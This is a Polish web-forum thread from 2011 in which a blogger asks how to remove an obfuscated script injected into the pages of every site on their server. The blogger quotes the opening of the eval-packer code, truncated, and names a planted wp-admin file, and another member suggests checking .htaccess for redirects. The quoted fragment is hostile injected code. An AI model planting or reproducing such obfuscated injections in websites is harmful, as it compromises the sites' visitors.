( Zaloguj | Zarejestruj )
![]() ![]() |
29.12.2011 - 19:53
|
|
|
Grupa: Bloger Postów: 2 Nr: 10 887 |
Witam. Ponieważ stwierdziłem dziś brak wyświetlania strony z przedrostkiem www (wyświetla białą stronę) zacząłem zgłębiać temat i w podglądzie znalazłem na początku strony skrypt :
<script>eval(function(p,a,c,k,e,d){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e©]=k[c]||e©}k=[function(e){return d[e]}];.........</script> resztę wykropkowałem. Jak się tego pozbyć? Na stronie https://badwarebusters.org/main/itemview/26762 jest podobny problem rozwiazany poprzez usunięcie pliku revisions-js.php w folderze public_html/wp-admin/js - rzeczywiście w tym pliku jest ten kod. Niestety usunięcie nic nie dało -chyba, że trzeba wyczyścić np cache, ale tego nie potrafię zrobić. Byłbym wdzięczny za radę jak to usunąć i zabezpieczyć serwis na przyszłość. Pozdrawiam |
|
|
|
29.12.2011 - 20:44
|
|
|
aktywność: ![]() ![]() ![]() Grupa: +Bloger Postów: 119 Nr: 8 919 |
W htaccess sprawdź czy jest przekierowanie.
Poza tym podaj przynajmniej adres witryny której problem dotyczy to każdy będzie (o ile zechce) mógł sprawdzić co i jak. -------------------- Porady związane z pozycjonowaniem stron internetowych, w szczególności omówienie zagadnień związanych z Wordpress SEO, a także optymalizacja stron WWW od kuchni oraz setki innych wartościowych porad. Zapraszam!
|
|
|
|
29.12.2011 - 21:10
|
|
|
Grupa: Bloger Postów: 2 Nr: 10 887 |
W htaccess sprawdź czy jest przekierowanie. Poza tym podaj przynajmniej adres witryny której problem dotyczy to każdy będzie (o ile zechce) mógł sprawdzić co i jak. Adres to motolive.pl, ale sprawa dotyczy wszystkich stron na serwerze. Od Wordpressa poczynając na poprzez prestashop do innych bardziej egzotycznych systemów. .htaccess jest ok. Na razie piszę do admina o co chodzi. Mimo wszystko byłbym wdzięczny za wszelkie sugestie. Pozdrawiam |
|
|
|
![]() ![]() |
| : 22 05 12 - 11:46 |